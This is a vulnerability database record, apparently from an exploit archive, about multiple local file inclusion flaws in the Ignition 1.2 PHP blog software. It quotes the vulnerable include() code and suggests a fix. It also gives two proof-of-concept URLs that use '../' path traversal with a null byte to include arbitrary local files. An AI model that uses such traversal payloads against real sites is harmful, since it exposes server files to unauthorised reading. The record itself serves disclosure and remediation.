Description
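Ignition 1.2 - Multiple Local File Inclusions. Both comment.php and view.php concatenate the unvalidated `blog` GET parameter into an include() path ('posts/' . $_GET['blog'] . '.txt'), so the request controls which file is included; the file_exists() check in view.php tests the same attacker-influenced path and does not confine it to posts/. The remedy is to validate `blog` against the expected identifier format, or to resolve the path (basename()/realpath()) and confirm it stays under posts/ before including it.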
{"lastseen": "2020-04-01T19:04:20", "references": [], "description": "\nIgnition 1.2 - Multiple Local File Inclusions", "edition": 1, "reporter": "cOndemned", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2009-12-20T00:00:00", "title": "Ignition 1.2 - Multiple Local File Inclusions", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-20T00:00:00", "id": "EXPLOITPACK:81FE9ACF6E437B78CCD435FFD168CF94", "href": "", "viewCount": 3, "sourceData": "Ignition 1.2 Multiple Local File Inclusion Vulnerabilities\ndisclosed by cOndemned\ndownload: http://launchpadlibrarian.net/27567060/ignition_1.2.zip\nnote: magic_quotes_gpc should be turned off in order to exploit this vulnerability\ngreetz: all friends, SecurityReason team :)\n\n\ncomment.php\n\n\t1.\t<?php \n\t2.\tsession_start();\n\t3.\trequire ('settings.php');\n\t4.\tinclude ('posts/'.$_GET['blog'].'.txt');\t\t\t# [1]\n\t5.\t?>\n\n\nview.php\n\n\t1.\t<?php\n\t2.\tsession_start();\n\t3.\trequire ('settings.php');\n\t4.\t$blog = $_GET['blog'];\n\t5.\tif (file_exists('posts/'.$_GET['blog'].'.txt')) {\n\t6.\tinclude ('posts/'.$_GET['blog'].'.txt');\t\t\t# [2]\n\t7.\t}else{\n\n\nproof of concept:\n\n\t[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00\n\t[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645818957, "score": 1659818015}, "_internal": {"score_hash": "96ce7dcafd926782221fd22c412c33c1"}}
{}